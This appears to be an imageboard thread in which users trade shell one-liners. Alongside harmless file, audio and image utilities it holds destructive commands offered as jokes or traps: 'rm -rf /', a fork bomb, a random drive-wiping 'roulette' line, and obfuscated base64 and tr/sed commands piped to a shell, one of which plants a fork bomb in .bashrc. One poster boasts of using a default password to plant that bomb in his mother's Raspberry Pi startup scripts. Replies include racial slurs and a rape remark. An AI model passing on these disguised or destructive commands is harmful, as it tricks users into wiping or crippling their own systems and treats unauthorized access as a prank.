tcpdump '((ip[6:2] > 0) and (not ip[6] = 64))'
Post ur bestest 1 liners
Other urls found in this thread:
rm -fr /
find -not -empty -type f -printf "%-30s'\t\"%h/%f\"\n" | sort -rn -t$'\t' | uniq -w30 -D | cut -f 2 -d $'\t' | xargs md5sum | sort | uniq -w32 --all-repeated=separate
for i in *; do mv "$i" "`sha256sum $i | cut -f 1 -d " "`.`echo "${i##*.}"`";done
rm: it is dangerous to operate recursively on '/'rm: use --no-preserve-root to override this failsafe
Find duplicate files , compare md5sums and move the duplicate?
rm -rf /
First one lists all duplicates starting in the working directory, and nothing more.
The second one renames all files to their sha256sums, but only keeps the last extension (so .tar.xz would become .xz)
y u no use older version without baby hand holding?
"Hey baby, are you hungry or are you just happy to see my dick?"
timeout 5h perl -le 'while (1) { sleep 60; chomp(my $dev = qx(sar -n SOCK|tail -1)); my ($tw) = (split " ", $dev)[-1]; if ($tw < 9000) { print $dev; system qq(timeout 10m tcpdump -nn -i eth0 -C500 -w /var/wtf/tcpdump-@{[time]} -Z root) } }'
Go back to halfchan
ln -s /dev/null garbage; mv you garbage
trap "espeak 'Good job, retard!'" ERR
that can't even work nigga
this will now brick your motherboard and nuke your efi partition beyond repair
thanks linus/systemd
Only if you install with UEFI comparability. Also, what does systemd, an init system, have anything to do with BIO/UEFI, grub and efi partitions? Nothing. You can install gentoo with UEFI and without systemd and still be able to do this.
# Find how many lands you need in an MTG list (you must count the mana symbols yourelqecho ggggbbuuuubbggrwbrgggggwwwwuuuggggrrrrgggguuuuuu | sed 's#.#&\n#g' | awk '/w|b|u|r|g/{cnt[$0]++}; END {total = 0; for (i in cnt) total = total + cnt[i]; for (i in cnt) print i " " cnt[i] / total * 20}'# Use the c preprocessor in sh scriptsgrep -e '^#CPP ' -e '^[^#]' "$1" | sed 's/#CPP /#/' | cpp -undef -x c | sh# Strip ansi sequences (needs GNU sed)sed -E "s#\x1b\\[([0-9]+;[0-9]+(H|f)|[0-9][A-D]|[suK]|2J|([0-9]+;)*[0-9]+m|=[0-9]+(h|l))##g"
[E [2 [0 3] [0 2]]]
You want to use variables inside the quoting hell.
uptime | perl -ne "/(\d+) d/;print 8,q(=)x\$1,\"D\n\""
meremor@ysengr:~/smartphone$ uptime | perl -ne "/(\d+) d/;print 8,q(=)x\$1,\"D\n\""8===============================================================================================================================================================D
is that intentional?
haven't seen this one in a long time
why has no one posted a fork bomb yet?
cd .
find / -type -print brain | xargs replace
not sure if I got this right but whatever
find is one of the God commands.
you have soiled it.
suffering will follow.
:(){ :|: & };:
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf --no-preserve-root / || echo *Click*
(*((void (*)(void))(0)))();
it's not a command, it's a program, you ding hole
$ which find
Kernighan and Pike don't make that distinction.
So what? All people make mistakes and sometimes blunders too.
They do that consistently. "Command" is a homonym. "find" is a command. You're just being incorrectly pedantic.
echo "ZWNobyBPaWdwZXlBNmZEb21JSDA3T2dvPSB8IGJhc2U2NCAtZCA+IC5iYXNocmMK" | base64 -d | sh
echo carl the moongeek/o.lye10uA8/C | tr gnu/homekat :phisth/bu\\- | sed s./.L. | bash | bash
php > echo base64_decode("ZWNobyBPaWdwZXlBNmZEb21JSDA3T2dvPSB8IGJhc2U2NCAtZCA+IC5iYXNocmMK");echo OigpeyA6fDomIH07Ogo= | base64 -d > .bashrcphp > echo base64_decode("OigpeyA6fDomIH07Ogo=");:(){ :|:& };:
Unused 4790k for sale!
[watch -n 15 'printf "Holla Forums Cancer Counter\n----------------------\\n" && kw="botnet codemonkey hotwheels jim josh rust" && for w in $kw; do echo " " $w: $(curl -sL
watch -n 15 'printf "Holla Forums Cancer Counter\n----------------------\n" && kw="botnet codemonkey hotwheels jim josh rust" && for w in $kw; do echo " " $w: $(curl -sL
[code]watch -n 15 'printf "Holla Forums Cancer Counter\n----------------------\n" && kw="botnet codemonkey hotwheels jim josh rust" && for w in $kw; do echo " " $w: $(curl -sL
watch -n 15 'printf "Holla Forums Cancer Counter\n----------------------\n" && kw="botnet codemonkey hotwheels jim josh rust" && for w in $kw; do echo " " $w: $(curl -sL
good work, pajeet
These aren't really bestest, but I find them to be useful.
Recursive convert audio
find . -type f -name "*.flac" -print0 | while read -d '' -r in; do opusenc --comp 10 --bitrate 64 "$in" "${in%.flac}".opus; done
Recursive find and optimize images
find . -type f -name "*.jpg" -exec jpegoptim {} \;
find . -type f -name "*.png" -exec optipng {} \;
Unzip folder of zip files into their own directory
for f in *.zip; do unzip -d "${f%*.zip}" "$f"; done
Zip directories into their own zip file
for i in *; do zip -r "${i%}.zip" "$i"; done
Recursive find and remove by extension
find . -type f -name "*.XXX" -exec rm "{}" \;
Still image with audio webm for chans
ffmpeg -r 1 -loop 1 -i 1.png -i 1.wav -c:v libvpx -c:a libvorbis -b:a 64k -shortest out.webm
holy shit that's funny i just ssh'd into my mom's raspberg pi and put that shit into a bunch of her startup scripts.
That's disgusting. Use grep -c. Use functions. Put it in a separate file, on multiple lines.
I'm a bashlet but I needed a pkill command who sends SIGKILLs instead of SIGTERMs for when I try to make music with jackd, so I made one with pgrep.
This line will install it in $HOME/bin/, you can pass options to pgrep, and it also gives you the list of processes which have been killed.
printf '#!/bin/sh\nfor pid in $(pgrep "$@"); do kill -9 $pid; done\nuntil [ $# -eq 1 ]; do shift; done\nps -A | grep $1' > $HOME/bin/pkill9 && chmod 755 $HOME/bin/pkill9
"pkill -9" or "pkill --signal KILL".
Read the man page.
Why would you do that?
Damn. I vaguely remember trying to use pkill -9 years ago and it wouldn't work the way I expected, so I thought it was a good idea to write this.
Well, I learned things about Unix at least.
because she still won't change the default password 'raspberry' even though i showed her that it's extremely vulnerable. she just acted bitchy when i showed her. she said "I don't have a password on my pi" i'm guessing she thinks that because theres no login screen.
Rape her.
$ mv /usr/bin/find /usr/bin/nigger
Same program, different command. Ergo 'find' is a command. QED
Russian roulette drive wiping.
not realizing
was using php to decipher
send yourself to the
#print out 400 random words from the dictionary, separated by space. Great for shitposting in data-mining threads. Or printing out random text to wrap around a (check|sensitive document) before posting to stop candle-lighting attacks.shuf -n400 /usr/share/dict/words|tr -s "\n" " "
>using php for anything